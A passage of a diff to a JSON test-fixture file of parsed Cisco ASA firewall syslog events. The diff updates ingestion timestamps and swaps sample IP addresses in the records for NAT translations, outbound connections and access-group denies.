localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1285 to outside:192.168.98.44/8289 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16479,8 +16479,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168224200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1286 to outside:100.66.98.44/8290 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.995975800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16526,8 +16526,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168231900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1287 to outside:100.66.98.44/8291 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.995981100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16573,8 +16573,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168240Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1288 to outside:100.66.98.44/8292 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.995987300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16620,8 +16620,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168247800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1293 to outside:100.66.98.44/8297 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.995993700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16667,8 +16667,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168253700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1294 to outside:100.66.98.44/8298 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.995999900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16693,8 +16693,8 @@ }, "destination": { "port": 8308, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1304, @@ -16734,7 +16734,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -16742,8 +16742,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168258800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1304 to outside:100.66.98.44/8308", + "ingested": "2021-12-09T13:33:41.996006200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1304 to outside:192.168.98.44/8308", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -16776,8 +16776,8 @@ }, "source": { "port": 80, - "address": "100.66.205.99", - "ip": "100.66.205.99" + "address": "192.168.205.99", + "ip": "192.168.205.99" }, "tags": [ "preserve_original_event" @@ -16812,7 +16812,7 @@ "localhost" ], "ip": [ - "100.66.205.99", + "192.168.205.99", "172.31.98.44" ] }, @@ -16821,8 +16821,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168263900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11840 for outside:100.66.205.99/80 (100.66.205.99/80) to inside:172.31.98.44/1304 (172.31.98.44/1304)", + "ingested": "2021-12-09T13:33:41.996012300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11840 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1304 (172.31.98.44/1304)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -16838,7 +16838,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.205.99", + "mapped_source_ip": "192.168.205.99", "connection_id": "11840", "source_interface": "outside", "mapped_destination_port": 1304 @@ -16876,8 +16876,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168269500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1295 to outside:100.66.98.44/8299 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.996018600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16923,8 +16923,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168277600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1296 to outside:100.66.98.44/8300 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.996024800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1296 to outside:192.168.98.44/8300 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16954,8 +16954,8 @@ }, "source": { "port": 53, - "address": "100.66.0.124", - "ip": "100.66.0.124" + "address": "192.168.0.124", + "ip": "192.168.0.124" }, "tags": [ "preserve_original_event" @@ -16990,7 +16990,7 @@ "localhost" ], "ip": [ - "100.66.0.124", + "192.168.0.124", "172.31.98.44" ] }, @@ -16999,8 +16999,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168285600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11841 for outside:100.66.0.124/53 (100.66.0.124/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:33:41.996031Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11841 for outside:192.168.0.124/53 (192.168.0.124/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -17016,7 +17016,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.0.124", + "mapped_source_ip": "192.168.0.124", "connection_id": "11841", "source_interface": "outside", "mapped_destination_port": 56132 @@ -17038,8 +17038,8 @@ }, "source": { "port": 53, - "address": "100.66.160.2", - "ip": "100.66.160.2" + "address": "192.168.160.2", + "ip": "192.168.160.2" }, "tags": [ "preserve_original_event" @@ -17074,7 +17074,7 @@ "localhost" ], "ip": [ - "100.66.160.2", + "192.168.160.2", "172.31.98.44" ] }, @@ -17083,8 +17083,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168291100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11842 for outside:100.66.160.2/53 (100.66.160.2/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:33:41.996037300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11842 for outside:192.168.160.2/53 (192.168.160.2/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -17100,7 +17100,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.160.2", + "mapped_source_ip": "192.168.160.2", "connection_id": "11842", "source_interface": "outside", "mapped_destination_port": 56132 @@ -17122,8 +17122,8 @@ }, "source": { "port": 53, - "address": "100.66.0.124", - "ip": "100.66.0.124" + "address": "192.168.0.124", + "ip": "192.168.0.124" }, "tags": [ "preserve_original_event" @@ -17158,7 +17158,7 @@ "localhost" ], "ip": [ - "100.66.0.124", + "192.168.0.124", "172.31.98.44" ] }, @@ -17168,8 +17168,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-10-06T20:55:00.168296400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11841 for outside:100.66.0.124/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 318", + "ingested": "2021-12-09T13:33:41.996043600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11841 for outside:192.168.0.124/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 318", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -17206,8 +17206,8 @@ }, "source": { "port": 53, - "address": "100.66.160.2", - "ip": "100.66.160.2" + "address": "192.168.160.2", + "ip": "192.168.160.2" }, "tags": [ "preserve_original_event" @@ -17242,7 +17242,7 @@ "localhost" ], "ip": [ - "100.66.160.2", + "192.168.160.2", "172.31.98.44" ] }, @@ -17252,8 +17252,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-10-06T20:55:00.168302200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11842 for outside:100.66.160.2/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", + "ingested": "2021-12-09T13:33:41.996050200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11842 for outside:192.168.160.2/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -17285,8 +17285,8 @@ }, "destination": { "port": 8309, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1305, @@ -17326,7 +17326,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -17334,8 +17334,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168308600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1305 to outside:100.66.98.44/8309", + "ingested": "2021-12-09T13:33:41.996056400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1305 to outside:192.168.98.44/8309", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -17368,8 +17368,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -17404,7 +17404,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -17413,8 +17413,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168315500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11843 for outside:100.66.124.24/80 (100.66.124.24/80) to inside:172.31.98.44/1305 (172.31.98.44/1305)", + "ingested": "2021-12-09T13:33:41.996062600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11843 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1305 (172.31.98.44/1305)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -17430,7 +17430,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.124.24", + "mapped_source_ip": "192.168.124.24", "connection_id": "11843", "source_interface": "outside", "mapped_destination_port": 1305 @@ -17468,8 +17468,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168323500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1297 to outside:100.66.98.44/8301 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.996068900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1297 to outside:192.168.98.44/8301 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -17515,8 +17515,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168330500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1298 to outside:100.66.98.44/8302 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.996075100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -17562,8 +17562,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168336300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1299 to outside:100.66.98.44/8303 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.996079800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -17609,8 +17609,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168341300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1300 to outside:100.66.98.44/8304 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.996084800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -17656,8 +17656,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168347100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1301 to outside:100.66.98.44/8305 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.996090600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -17703,8 +17703,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168352900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1302 to outside:100.66.98.44/8306 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.996096Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -17750,8 +17750,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168358400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1303 to outside:100.66.98.44/8307 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.996100400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1303 to outside:192.168.98.44/8307 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -17781,8 +17781,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -17817,7 +17817,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -17828,8 +17828,8 @@ "severity": 6, "duration": 4000000000, "reason": "TCP Reset-I", - "ingested": "2021-10-06T20:55:00.168363800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11843 for outside:100.66.124.24/80 to inside:172.31.98.44/1305 duration 0:00:04 bytes 410333 TCP Reset-I", + "ingested": "2021-12-09T13:33:41.996105400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11843 for outside:192.168.124.24/80 to inside:172.31.98.44/1305 duration 0:00:04 bytes 410333 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:52.000Z", @@ -17866,8 +17866,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -17901,7 +17901,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -17910,8 +17910,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.168369700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.996111700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -17947,8 +17947,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -17982,7 +17982,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -17991,8 +17991,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.168375500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.996116300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -18028,8 +18028,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18063,7 +18063,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -18072,8 +18072,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.168381100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.996120900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -18104,8 +18104,8 @@ }, "destination": { "port": 8310, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1306, @@ -18145,7 +18145,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -18153,8 +18153,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168386800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1306 to outside:100.66.98.44/8310", + "ingested": "2021-12-09T13:33:41.996125100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1306 to outside:192.168.98.44/8310", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -18187,8 +18187,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18223,7 +18223,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -18232,8 +18232,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168394700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11844 for outside:100.66.124.24/80 (100.66.124.24/80) to inside:172.31.98.44/1306 (172.31.98.44/1306)", + "ingested": "2021-12-09T13:33:41.996129900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11844 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1306 (172.31.98.44/1306)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -18249,7 +18249,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.124.24", + "mapped_source_ip": "192.168.124.24", "connection_id": "11844", "source_interface": "outside", "mapped_destination_port": 1306 @@ -18271,8 +18271,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18306,7 +18306,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -18315,8 +18315,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.168402200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.996136300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -18352,8 +18352,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18387,7 +18387,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -18396,8 +18396,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.168407Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.996142600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -18433,8 +18433,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18468,7 +18468,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -18477,8 +18477,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.168412300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.996148800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -18514,8 +18514,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18549,7 +18549,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -18558,8 +18558,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.168417100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.996155300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -18595,8 +18595,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18630,7 +18630,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -18639,8 +18639,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.168422700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.996161500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -18676,8 +18676,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18711,7 +18711,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -18720,8 +18720,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.168428100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.996167700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -18757,8 +18757,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18792,7 +18792,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -18801,8 +18801,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.168435100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.996175600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -18838,8 +18838,8 @@ }, "source": { "port": 80, 